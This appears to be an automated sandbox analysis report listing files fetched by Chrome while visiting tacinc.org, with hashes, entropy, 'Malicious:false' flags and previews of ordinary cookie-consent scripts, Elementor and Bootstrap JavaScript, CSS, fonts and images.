                                                                                                                                                                                                                              SHA-512:5A9E6D543E33185AC1420913D3C0EA99F107F7E17AA06FE594FF92ADE84A995B00286A376ED0F5D0674383216DD3C1B669BFFF8E1BFD2FEF68A0AE7D09C22430
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.tacinc.org/wp-content/uploads/hummingbird-assets/a0e9216368a65f19aaba6582fba739f2.js
                                                                                                                                                                                                                              Preview:/**handles:cookie-law-info,spb-frontend-js-min,imagesLoaded,jquery-viewports,jquery-smartresize**/..CLI_ACCEPT_COOKIE_NAME="undefined"!=typeof CLI_ACCEPT_COOKIE_NAME?CLI_ACCEPT_COOKIE_NAME:"viewed_cookie_policy",CLI_PREFERENCE_COOKIE="undefined"!=typeof CLI_PREFERENCE_COOKIE?CLI_PREFERENCE_COOKIE:"CookieLawInfoConsent",CLI_ACCEPT_COOKIE_EXPIRE="undefined"!=typeof CLI_ACCEPT_COOKIE_EXPIRE?CLI_ACCEPT_COOKIE_EXPIRE:365,CLI_COOKIEBAR_AS_POPUP="undefined"!=typeof CLI_COOKIEBAR_AS_POPUP&&CLI_COOKIEBAR_AS_POPUP;var CLI_Cookie={set:function(e,t,i){var o="",n,n,n,i;!0===Boolean(Cli_Data.secure_cookies)&&(o=";secure"),n=i?((n=new Date).setTime(n.getTime()+24*i*60*60*1e3),"; expires="+n.toGMTString()):"",document.cookie=e+"="+t+o+n+"; path=/",i<1&&(host_name=window.location.hostname,document.cookie=e+"="+t+n+"; path=/; domain=."+host_name+";",1!=host_name.indexOf("www")&&(i=host_name.replace("www",""),document.cookie=e+"="+t+o+n+"; path=/; domain="+i+";"),host_name=host_name.substring(host_name.l
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):5
                                                                                                                                                                                                                              Entropy (8bit):1.5219280948873621
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:U8n:U8n
                                                                                                                                                                                                                              MD5:83D24D4B43CC7EEF2B61E66C95F3D158
                                                                                                                                                                                                                              SHA1:F0CAFC285EE23BB6C28C5166F305493C4331C84D
                                                                                                                                                                                                                              SHA-256:1C0FF118A4290C99F39C90ABB38703A866E47251B23CCA20266C69C812CCAFEB
                                                                                                                                                                                                                              SHA-512:E6E84563D3A55767F8E5F36C4E217A0768120D6E15CE4D01AA63D36AF7EC8D20B600CE96DCC56DE91EC7E55E83A8267BADDD68B61447069B82ABDB2E92C6ACB6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://p.typekit.net/p.css?s=1&k=cab6zwi&ht=tk&f=137.138.139.140.169.170.171.172.173.174.175.176.5474.5475.25136.25137.141.142.143.144.145.146.147.148.149.150.151.152.153.154.25138.25139.155.156.157.158.159.160.161.162.163.164.165.166.167.168.25140.25141.5469.18456.18457.18458.18459.18460.18461.18462.22705.37552.37553.37554.37555.37556.37557.37558.37559.37560&a=82836448&app=typekit&e=css
                                                                                                                                                                                                                              Preview:/**/.
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (4957)
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4997
                                                                                                                                                                                                                              Entropy (8bit):5.401815473562889
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:BpsNt0jqf9fz9Af8nDmDllCjNVobVDPkqflkxwvT8S2:TsNCjw9fhHyD4N4FPkyXgS2
                                                                                                                                                                                                                              MD5:5A34BDBECD4477E6584A8D16AB0759C1
                                                                                                                                                                                                                              SHA1:FFA04176D8AC3FAF769B7C05094A6853FDD90705
                                                                                                                                                                                                                              SHA-256:0BE5CFCE38027AB2B0684D571062CB428B40962791261518159D32970486468D
                                                                                                                                                                                                                              SHA-512:AE8F3101C4CAB84CF8AEBB7AD52C6C96E00516FEA894958A73920C7918E6A486A8BE69D6769A23026D615C26E8899CCFDEFF4399144586DF8A8F5E6BF930B15A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Preview:/*! elementor - v3.24.0 - 09-10-2024 */.(()=>{"use strict";var e,r,_,t,a,i={},n={};function __webpack_require__(e){var r=n[e];if(void 0!==r)return r.exports;var _=n[e]={exports:{}};return i[e].call(_.exports,_,_.exports,__webpack_require__),_.exports}__webpack_require__.m=i,e=[],__webpack_require__.O=(r,_,t,a)=>{if(!_){var i=1/0;for(u=0;u<e.length;u++){for(var[_,t,a]=e[u],n=!0,c=0;c<_.length;c++)(!1&a||i>=a)&&Object.keys(__webpack_require__.O).every((e=>__webpack_require__.O[e](_[c])))?_.splice(c--,1):(n=!1,a<i&&(i=a));if(n){e.splice(u--,1);var o=t();void 0!==o&&(r=o)}}return r}a=a||0;for(var u=e.length;u>0&&e[u-1][2]>a;u--)e[u]=e[u-1];e[u]=[_,t,a]},_=Object.getPrototypeOf?e=>Object.getPrototypeOf(e):e=>e.__proto__,__webpack_require__.t=function(e,t){if(1&t&&(e=this(e)),8&t)return e;if("object"==typeof e&&e){if(4&t&&e.__esModule)return e;if(16&t&&"function"==typeof e.then)return e}var a=Object.create(null);__webpack_require__.r(a);var i={};r=r||[null,_({}),_([]),_(_)];for(var n=2&t&&e;
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1440x440, components 3
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):7417
                                                                                                                                                                                                                              Entropy (8bit):6.96294349709708
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:3XgaoXMlj7oOoRKnX5o2o7ECBap2ZJJJJJJJJVPQ95ICwjx8rn:3XgXXMlj7aKJo24Ba6PQ95ICwjx8rn
                                                                                                                                                                                                                              MD5:9CDBA1B0B72DC4E6F9A1FBA7484FB4EC
                                                                                                                                                                                                                              SHA1:112204A0479FD669E9CB49B5F207984127958689
                                                                                                                                                                                                                              SHA-256:94FB3B7A35183CE222B869092C9F121478044220021A30838F3084C388A5D133
                                                                                                                                                                                                                              SHA-512:D35FD28378814CD4E0DD82416B873CD9C30879B8A879A4E9D2D0FF9B17ED5E29ACF744095C361B18D49AF36632D2299A6397F5CAB175EAAEC4D12C46135766B4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.tacinc.org/wp-content/uploads/2020/11/footer-tall.jpg
                                                                                                                                                                                                                              Preview:......JFIF...........................................$......$ &...& 9-''-9B747BOGGOd_d................................$......$ &...& 9-''-9B747BOGGOd_d.............."..............................................."...........................................................................................^......................3..x........................................................................5p......................+........................SL....e)v}....................UD@.8.......................).......%;-H................".:%.NSG........].t..............9....:...)JR.@......;n...........q.!...........9N@........@.......*.u...........vVJ.................0..............}@.......l......5B.............>.......Yu.....8..........g..............t...9EUW.......h...............o....i........R.....P........_w@..4........*.......E>.............s.H.......tD......T=`........v..G5........#.....).D......................@....s.............9..V]0......*......g.............f..'m.......
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 367x266, components 3
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):18221
                                                                                                                                                                                                                              Entropy (8bit):7.966733678103932
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:xB3WbtBfT84iMteMZ4QuOegNwKtAeQBXtAThRFU:z3Mzlxt54grs9AT9U
                                                                                                                                                                                                                              MD5:BA82D93BADA7AAC2AFD0B3663D89D5A0
                                                                                                                                                                                                                              SHA1:33A19D9909B38441A628FA6036CF030C2C60D0F7
                                                                                                                                                                                                                              SHA-256:D0758EDF5F7711B4B5E229A0C2F07CDACF45306AB3291D078DC7D30D08DDB1F5
                                                                                                                                                                                                                              SHA-512:767CE873D71D21288BA33F1A361E6CE58DB7AD6D59C3358A051214880F3C94F483A342999076A1A7A1DEF9CD54AAE2254646F85253A48F53A94113AA32B68A68
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Preview:......JFIF...........................................$......$ &...& 9-''-9B747BOGGOd_d................................$......$ &...& 9-''-9B747BOGGOd_d...........o.."..........4...................................................................H....V...%C......-..I541S..5.@5!..x.x.....x:..yb...V.i..i)..._.....#.&..G&....7+E7.,..'........^.^...LoK......5....#....]c..j@&la..Y.q..)0.....\YB..Q...#......J2y_..{x..3Zl......4]c.d..m.z%....4U.K...R..B...S...........R.R.m.jJ..4..!.%..aE&..A...W*v...........G...8X.!B..D.L..)e....,S....\).&D......X......\...f.7.........aZ.1Y..Z}..J.....j<....4,...g}..iT.q8.XL.v..|............D...x.^..U...U..c....|... {c(.E..HQ.s.A..S..'..7-i.....&...i..j.d.<."7 `8..crx..MC!..........T....Cf..).....'}.&O..}..b`.1......i.......\'..L(..Ww.....i....K|.f.-K.M2.p..k.,u}.cs..3......]J"..Z.R..h).D7..:.J...~....w....7l.j...y.H.l....+.....z|.x..A..7.....T..|@B..Y...v.4..I.=.^.j......o....:Ex.o.....i.f..rW!.p.P.W..~.EJ..a..XK..r.._
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (41281)
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):41321
                                                                                                                                                                                                                              Entropy (8bit):5.277045082197564
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:ERxjjLRkR68ZvxH2Ea/AfjSfufVgLIH1/QlKEAzBc5G8TSebsvT2C8UlBSB5oodA:ERxvLRkR681xH2EanufVtfEAzBc5TTS9
                                                                                                                                                                                                                              MD5:650F6D97D5EFB2781F897B385C4C94A0
                                                                                                                                                                                                                              SHA1:D2C05E33461656F84CF31CE29AB51AEF79A6B561
                                                                                                                                                                                                                              SHA-256:D4A6A819218B18C9BD0095D7BA200469AC95A835CA55DA1F8374B520407F5F59
                                                                                                                                                                                                                              SHA-512:FD9614E07A5C067C51EAF86FD79B4601463DBCB5AAAF7FA60390BED76DB48DCAD61DB151DA6506858B29D9D68AB9D19CC40D3A0E2D7B6CFBB98805BF072D89C8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Preview:/*! elementor - v3.24.0 - 09-10-2024 */."use strict";(self.webpackChunkelementor=self.webpackChunkelementor||[]).push([[819],{9220:(e,t,n)=>{var o=n(3203);Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var s=o(n(8135));class _default extends elementorModules.ViewModule{constructor(){super(...arguments),this.documents={},this.initDocumentClasses(),this.attachDocumentsClasses()}getDefaultSettings(){return{selectors:{document:".elementor"}}}getDefaultElements(){const e=this.getSettings("selectors");return{$documents:jQuery(e.document)}}initDocumentClasses(){this.documentClasses={base:s.default},elementorFrontend.hooks.doAction("elementor/frontend/documents-manager/init-classes",this)}addDocumentClass(e,t){this.documentClasses[e]=t}attachDocumentsClasses(){this.elements.$documents.each(((e,t)=>this.attachDocumentClass(jQuery(t))))}attachDocumentClass(e){const t=e.data(),n=t.elementorId,o=t.elementorType,s=this.documentClasses[o]||this.documentClasses.base;this.documents[
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 14892, version 1.0
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):14892
                                                                                                                                                                                                                              Entropy (8bit):7.98489201092774
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:LKrbeS3uuEGg7o6yDdWa/TQcNc+rAsmnsTJ39cUZi:LKneSe4/6yDFU6rAGJZE
                                                                                                                                                                                                                              MD5:9EC6DEAF6BADA919E20B98F9F7B718B1
                                                                                                                                                                                                                              SHA1:501D36403AD8205E4644532600019ECB10F5CB0A
                                                                                                                                                                                                                              SHA-256:7B348B30EA1FE43857E68FC462C29E5C6E63C97666AF75135C4396A272E54762
                                                                                                                                                                                                                              SHA-512:03849431CEF204A1584FFE6F23DBE86730AFD076146AB3D1855B9C3402168A97FAA8A529E69FAE45EA24CFF7110C2930CB4744162BA0ED95D95600F6E777B322
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://fonts.gstatic.com/s/sourcesanspro/v22/6xK3dSBYKcSV-LCoeQqfX1RYOo3qOK7l.woff2
                                                                                                                                                                                                                              Preview:wOF2......:,.......|..9..........................n..B....`..b...L.4..d..6.$..D. ..f..4..v%..........D..dd.do......:d..M....E.&..J..G....3.Mxp....i....V..u$.[O.;MU.:j.?..{+/<....s....^[..d.d.....t A....`..z....IN^.......2......mY.kF...\...UYU..........$.O=5..2q..L.2.1.c.....`x~n=.'Ur.66V.f]./..L1..P..<.0.<.8.....Z/.+.H....y..F....h5....V.j.....l..O#.:-Q....9g....:..?..8v];u,O..'....c.\r......].&w.....%@..Z.^....$.,dJ....W.{.....h8}4..S/.sZ...f."$..`a.$Mb.....;.W.."..y.H.<.g.......oNS..MO....X.%.8..y.\...ly..w..?-.~.o.ZZ~G.....B.....@...._....g.fF_...d-...aA_..#k.I.....x...P.}z..JQ&E........).P|."g.#.)Q.*T...}.PD.T+<}c+.||0...2.F..hD.X.J.O.eJ:.%ZW.m.K.Jd..*c.7.....T.cr.2....DD.........2..y..?/g...... ={..c /.....X.0.F.F.PX.P..!..K..K.....i.%....B.."...A....F.........4..........S........z$`.T..h...E..........._%=..).)......x)...A.J..K...?.V.......w.Y}..N.....}..>.......%.f.O..o.{..=wz.e_&.O\..*..Q..c.'...X&.1wS.R..AY...G.....Q.f...z..E..u8&V
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):505
                                                                                                                                                                                                                              Entropy (8bit):7.39834023751384
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:6v/7iWPpwpldefErkMFhBQ1Z6XPKLuyIjY1Ret9hBwhnF+FUe2H:nndL9BQ1ZoPKKx6KB+gl2H
                                                                                                                                                                                                                              MD5:904A10D841800245B4FA3AF27F088DC8
                                                                                                                                                                                                                              SHA1:0E4A647A4ED88E5074D98F25D2EFA5519BD53873
                                                                                                                                                                                                                              SHA-256:ECA33925DD81CADBBA305DD1A215C97CA48673F5B5255788A62527B3787DEB0C
                                                                                                                                                                                                                              SHA-512:2474575903073505CF3E21DA35C581F374B4EE3DFBC3F5FEC19CB39DD6C23D35C705246C4F603E625747C9C2285F537E364D88B36E67FCE3C53DC72DC7B26D01
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Preview:.PNG........IHDR... ... .....szz.....IDATx...1K.@... "... :.FW.. "....!.89.nR...(...B@\..v.Q.].fv.. ..>..o...hlO..........VQE..v.l.!.(G.>...B.d(.......uH.D;.E..~8.qN#.............\..."m...vVdz#y5.<9......'5c.?h..w..oa....Y...s.j..6@.....1y..c..j..u.F...q8.6FS..8.p4...Kx.....H..!.!...Q..B........@..(......A... P<K....../.;.C...... P.I.A.B@..KpX......*..%f.j.+XH...X..;.*.(....p.>..% ..I..k'{.#.rB9..Al.....L...j.....D...0.v+..D......,....D/.x@.T...X.D....VQE.....9e.\V.j....IEND.B`.
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (4957)
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):4997
                                                                                                                                                                                                                              Entropy (8bit):5.401815473562889
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:BpsNt0jqf9fz9Af8nDmDllCjNVobVDPkqflkxwvT8S2:TsNCjw9fhHyD4N4FPkyXgS2
                                                                                                                                                                                                                              MD5:5A34BDBECD4477E6584A8D16AB0759C1
                                                                                                                                                                                                                              SHA1:FFA04176D8AC3FAF769B7C05094A6853FDD90705
                                                                                                                                                                                                                              SHA-256:0BE5CFCE38027AB2B0684D571062CB428B40962791261518159D32970486468D
                                                                                                                                                                                                                              SHA-512:AE8F3101C4CAB84CF8AEBB7AD52C6C96E00516FEA894958A73920C7918E6A486A8BE69D6769A23026D615C26E8899CCFDEFF4399144586DF8A8F5E6BF930B15A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.tacinc.org/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js
                                                                                                                                                                                                                              Preview:/*! elementor - v3.24.0 - 09-10-2024 */.(()=>{"use strict";var e,r,_,t,a,i={},n={};function __webpack_require__(e){var r=n[e];if(void 0!==r)return r.exports;var _=n[e]={exports:{}};return i[e].call(_.exports,_,_.exports,__webpack_require__),_.exports}__webpack_require__.m=i,e=[],__webpack_require__.O=(r,_,t,a)=>{if(!_){var i=1/0;for(u=0;u<e.length;u++){for(var[_,t,a]=e[u],n=!0,c=0;c<_.length;c++)(!1&a||i>=a)&&Object.keys(__webpack_require__.O).every((e=>__webpack_require__.O[e](_[c])))?_.splice(c--,1):(n=!1,a<i&&(i=a));if(n){e.splice(u--,1);var o=t();void 0!==o&&(r=o)}}return r}a=a||0;for(var u=e.length;u>0&&e[u-1][2]>a;u--)e[u]=e[u-1];e[u]=[_,t,a]},_=Object.getPrototypeOf?e=>Object.getPrototypeOf(e):e=>e.__proto__,__webpack_require__.t=function(e,t){if(1&t&&(e=this(e)),8&t)return e;if("object"==typeof e&&e){if(4&t&&e.__esModule)return e;if(16&t&&"function"==typeof e.then)return e}var a=Object.create(null);__webpack_require__.r(a);var i={};r=r||[null,_({}),_([]),_(_)];for(var n=2&t&&e;
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                              Entropy (8bit):3.75
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Hd1Y:w
                                                                                                                                                                                                                              MD5:FA9C17CE126A76733ACA269345EB7D47
                                                                                                                                                                                                                              SHA1:F1D8AA71F281509D55041F671B1A7BD94524AAD8
                                                                                                                                                                                                                              SHA-256:15F88A501BBE49A103551BA087FE6FC7E101894E71C3A74A42E8EFC07DCEC0D8
                                                                                                                                                                                                                              SHA-512:DD2E08D8D294E24330DDACFCC602D5AB9C9BD65346E0C6540F599725AB711E1F1621D3939318BFC069E67CEF889B80E781DA3E935D61C26E2086DAC79428818C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSEAntaswVMDpqFRIFDRM0Cs4=?alt=proto
                                                                                                                                                                                                                              Preview:CgkKBw0TNArOGgA=
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (8166), with CRLF, LF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):21023
                                                                                                                                                                                                                              Entropy (8bit):5.312899226772537
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:Lm/CDEqBfPf4yoQRPzF2bBrBvy8aYA17oTgVl9ZDlfHni4RW+:0CDEqBfHoQR7F2bBrpCYA17oTyl9Z1G+
                                                                                                                                                                                                                              MD5:2F22804E2D243AF2B2DF992BC445A31F
                                                                                                                                                                                                                              SHA1:6D1874CBBC670017DB10FCB71F082A93A111B24D
                                                                                                                                                                                                                              SHA-256:CC511F17A0DE02CA84F689B7B5E53F855C3302E5D2613DEA6C463C589B5B715D
                                                                                                                                                                                                                              SHA-512:4C074E31DECAA7F13EF49B620D9B71240241A9B0368C35F626978A11210CFA626B539C3CF7084BB5516314AF3737A7E846F89AA84F14354483F5B20A19B52A2C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Preview:/**handles:theme-script,ecs_ajax_load,smush-lazy-load,jetpack-stats,ecs-script**/..jQuery(document).ready(function(){}),function(s){s(document).ready(function(){navigator.userAgent.toLowerCase().match(/(iphone|ipod|android|iemobile)/);var e=s("#sf-option-params").data("template-directory"),t=s("#sf-option-params").data("stylesheet-directory");s("#sf-option-params").data("home"),document.title,document.URL;s(".elementor-post__read-more").append(' <i aria-hidden="true"><img class="inject-me" data-src="'+e+'/images/icon-arrow.svg" src="'+e+'/images/icon-arrow.png" /></i>'),s(".elementor-search-form__submit i").html(' <img class="inject-me" data-src="'+t+'/images/icon-search.svg" src="'+t+'/images/icon-search.png" />'),s(".elementor-search-form__submit i").removeClass("fa").removeClass("fa-search"),0<s("img.inject-me").length&&(a=document.querySelectorAll("img.inject-me"),SVGInjector(a,{},function(e){})),s(".elementor-widget-tabs").each(function(){$thisMenu=s(this).find(".elementor-tabs-wr
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:PNG image data, 768 x 432, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):145490
                                                                                                                                                                                                                              Entropy (8bit):7.9566319284646365
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:UNs5Yj2PCAiiBQsqTetFq1CPEVcnqrPmknV4C4SDrfJU174VInCHtCa:EMvPdZqgc+EVPP7tnfZjp
                                                                                                                                                                                                                              MD5:DB074B1DBA5C030657D8F5C2CEE87165
                                                                                                                                                                                                                              SHA1:F0CAE663CA2F76F72D720F89A244E8A7CF849E1B
                                                                                                                                                                                                                              SHA-256:A85A272BE4F1F0198B11E60EBB9E2441E1723E99BA7BB16E4A4BDB95D60E86DA
                                                                                                                                                                                                                              SHA-512:7060EA702C0144E279239B1076FF52CAABAF3A4EA70F562CC7B727282F59A58997C5A28D99B93CC39EFB55B9D1E6398304DF99451CA33744DD73B1A43C664325
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Preview:.PNG........IHDR.............)......XPLTE...S.t...............................('h........W.w......X.wS.uO.r......L.u........[.zV.p......V.v.....{..)4.T.p...K.m....b.zM.p............zPb.{9.[.F.9m..i......0UfrEVbRZi...z.....m(_.z>Th...((oL.m#oGD.e...i.............V.t<O].....^mx$cG,hQ.........G.e......>y^PSb$.....ox{...Iwg........p..]..(-|....<...[.mS.p....../..A]dk...T{m`.y....$...r..z..:&...........JhfU.o..,...IPW.y*Q{../" W.\O6.Fp~.]$\....v.-imp:iYk...........fH!..Q...y...J.\>ct./3...c.w..an..KJB.'....9z...#|...........w..5?Ns.a....p<..]q[4d]L..[..N..S...~wX...p..A..t.v<[...rT..9E}=....6y...|Z....,..5.IDATx...O[g.7.J.i!.Q.@eGJd3.....f$B0Fq?X."#=..l.=..H..[..J....%. j.y..)$09...J.N..}Og...[k]/{o..LH..{.....6n..].z_-oM.........o......g....w...]]]._.<..>.s.......9..|..O../.,.}T.....|.....t..-N,..z..?....{.._...{....;.k'9.......s.Cx..3>?..G;...D.....w...%~>.9...G...z.bN.......o......B..5...;...~B....4.g.k....c.....y........[....0...
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):198027
                                                                                                                                                                                                                              Entropy (8bit):5.111424530342115
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6144:6Jhom54VfaSmkZHwk1mA3kSDL3Kyu5ZrKeB0eTbG:6eaSTZHwk1mA3kSDL3Kyu5ZrKeB0eTbG
                                                                                                                                                                                                                              MD5:B1371F7B45E653EA47CAA9578D8BFFB4
                                                                                                                                                                                                                              SHA1:CB8420AC64AA641E28C486A1ED56C6211CB72E37
                                                                                                                                                                                                                              SHA-256:D932885ED5DC640B22F12105DB9FD4843F40A96CD3C3460F7FF0D4BA04398C35
                                                                                                                                                                                                                              SHA-512:D0705437158BBC78361B649070BF18B80987962ACB0D2056656251691027E4B3349E5DF3D526407885AE671C5C39D951A1B66472D17EF2BF50096D511C81DA2F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.tacinc.org/wp-content/plugins/socialdriver-framework/includes/page-builder/frontend-assets/css/spb-styles.min.css
                                                                                                                                                                                                                              Preview:.ui-helper-reset{font-family:inherit;font-size:inherit;line-height:inherit}.ui-accordion .ui-accordion-icons{padding:0!important}html.noscroll{position:fixed;overflow-y:scroll;width:100%}.mt0{margin-top:0!important}.mb0{margin-bottom:0!important}.mr0{margin-right:0!important}.ml0{margin-left:0!important}.pt0{padding-top:0!important}.pb0{padding-bottom:0!important}.pr0{padding-right:0!important}.pl0{padding-left:0!important}.bt0{border-top:0!important}.bb0{border-bottom:0!important}.no-shadow{-webkit-box-shadow:none!important;-moz-box-shadow:none!important;box-shadow:none!important}.pmb0 p{margin-bottom:0!important}.col-sm-sf-5{width:20%;padding:0 15px;float:left}.col-sm-sf-25{width:40%;padding:0 15px;float:left}.sf-container-overlay{position:fixed;top:0;left:0;z-index:999;width:100%;height:100%;background:rgba(0,0,0,.8);cursor:pointer;display:none;opacity:0}.sf-container-overlay .sf-loader{position:absolute;top:50%;left:50%;margin:-16px 0 0 -16px}.sf-container-overlay.loading-done .sf-
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1249370
                                                                                                                                                                                                                              Entropy (8bit):5.284753209003542
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12288:2xXCuONi2pMPcMxXM208175RXl8svDr7e8k4XWTHA3zi3kd:2xLOO0y77h7r7Hk4XWTHA3zi3A
                                                                                                                                                                                                                              MD5:00764D21AC5B2ED16124B230D388F06D
                                                                                                                                                                                                                              SHA1:1928E1F1A497E4A0076B11018105D8E034460E6A
                                                                                                                                                                                                                              SHA-256:D2AC101ADFB5C923A2C45E25611D16D2C444655BC659035806372876E4172F62
                                                                                                                                                                                                                              SHA-512:37BAD4B1D992B354A2BD2F5025EA560CFD50B23051F7D003942ACA30C9B3EFE3158E45E5F2A903517876E00BE8A54A24F90BA361D991B904502F033B132EFF34
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Preview:!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e((t=t||self).bootstrap={},t.jQuery,t.Popper)}(this,function(t,c,s){"use strict";function N(t,e){for(var i=0;i<e.length;i++){var n=e[i];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(t,n.key,n)}}function e(t,e,i){e&&N(t.prototype,e),i&&N(t,i)}function o(n){for(var t=1;t<arguments.length;t++){var s=null!=arguments[t]?arguments[t]:{},e=Object.keys(s);(e="function"==typeof Object.getOwnPropertySymbols?e.concat(Object.getOwnPropertySymbols(s).filter(function(t){return Object.getOwnPropertyDescriptor(s,t).enumerable})):e).forEach(function(t){var e=n,i=s[t=t];t in e?Object.defineProperty(e,t,{value:i,enumerable:!0,configurable:!0,writable:!0}):e[t]=i})}return n}c=c&&c.hasOwnProperty("default")?c.default:c,s=s&&s.hasOwnProperty("default")?s.defau
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 17784, version 1.0
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):17784
                                                                                                                                                                                                                              Entropy (8bit):7.986411870892981
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:X8y78KLID/rsre1DJjiXeDdsJs7lq7krzHr6g682IvDM6f+r70WQm:X8y78KUD59MZYqkvLvqIvjf+r7em
                                                                                                                                                                                                                              MD5:263D6267533501F58C33B12B382E3ABB
                                                                                                                                                                                                                              SHA1:8AE9D89B0BFA4B95C8144D0D972D983F029C3275
                                                                                                                                                                                                                              SHA-256:2AC23279590F18F4577084E3B030600FF80E7D4EAEA2A52A9237579F3842F985
